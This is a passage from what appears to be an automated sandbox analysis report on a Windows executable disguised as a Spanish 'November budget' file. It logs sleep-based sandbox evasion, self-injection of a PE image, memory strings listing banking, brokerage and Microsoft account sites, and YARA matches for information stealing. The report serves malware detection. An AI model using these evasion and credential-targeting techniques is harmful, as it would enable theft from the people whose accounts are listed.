                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595234Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595125Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595016Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 594905Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 594797Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 594687Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 594578Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 594469Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeWindow / User API: threadDelayed 8233Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeWindow / User API: threadDelayed 1615Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 2132Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep count: 36 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -599875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7700Thread sleep count: 8233 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7700Thread sleep count: 1615 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -599756s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -599641s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -599531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -599422s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -599313s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -599188s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -599063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -598938s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -598828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -598711s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -598609s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -598499s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -598378s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -598266s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -598156s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -598046s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -597938s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -597828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -597719s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -597609s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -597500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -597390s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -597281s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -597172s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -597063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -596938s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -596813s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -596688s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -596578s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -596469s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -596344s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -596234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -596125s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -596016s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -595906s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -595797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -595687s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -595578s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -595469s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -595344s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -595234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -595125s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -595016s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -594905s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -594797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -594687s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -594578s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696Thread sleep time: -594469s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 599756Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 599641Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 599531Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 599422Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 599313Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 599188Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 599063Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598938Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598828Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598711Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598609Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598499Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598378Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598266Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598156Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598046Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597938Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597828Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597719Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597609Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597500Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597390Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597281Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597172Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597063Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596938Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596813Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596688Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596578Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596469Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596344Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596234Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596125Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596016Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595906Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595797Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595687Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595578Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595469Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595344Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595234Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595125Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595016Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 594905Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 594797Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 594687Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 594578Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 594469Jump to behavior
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696503903o
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696503903x
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696503903
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696503903
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696503903
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696503903
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696503903t
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3748822121.00000000014C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696503903t
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696503903s
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $_qEmultipart/form-data; boundary=------------------------8dcfa7be7f62c54<
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696503903j
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696503903f
                      Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeCode function: 5_2_05C19548 LdrInitializeThunk,5_2_05C19548
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeMemory written: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess created: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe "C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeQueries volume information: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeQueries volume information: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR
                      Source: Yara matchFile source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR
